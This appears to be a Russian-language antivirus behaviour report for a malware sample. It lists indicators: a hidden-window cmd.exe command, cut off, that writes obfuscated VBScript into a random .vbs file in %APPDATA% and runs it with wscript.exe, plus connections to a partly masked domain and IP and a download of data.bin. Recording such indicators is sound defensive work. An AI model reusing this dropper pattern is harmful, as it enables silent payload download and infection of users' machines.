Техническая информация
- '<SYSTEM32>\cmd.exe' /V /C set "YNiVD=%APPDATA%\%RANDOM%.vbs" && (for %i in ("DiM D8" "FunctioN Rh4S1cg(PER3e1)" "BOuB9N=97" "Rh4S1cg=asC(PER3e1)" "BZ2akhk=66" "ENd fUnCtIoN" "sUb XfWbna7()" "JUgV=61" "Dim MGQGBp, ...
- %APPDATA%\31635.vbs
- 'pa###louf.com':80
- '20#.#7.8.251':80
- http://pa###louf.com/data.bin
- DNS ASK pa###louf.com
- '<SYSTEM32>\wscript.exe' "%APPDATA%\31635.vbs"
- '<SYSTEM32>\cmd.exe' /V /C set "YNiVD=%APPDATA%\%RANDOM%.vbs" && (for %i in ("DiM D8" "FunctioN Rh4S1cg(PER3e1)" "BOuB9N=97" "Rh4S1cg=asC(PER3e1)" "BZ2akhk=66" "ENd fUnCtIoN" "sUb XfWbna7()" "JUgV=61" "Dim MGQGBp, ...' (со скрытым окном)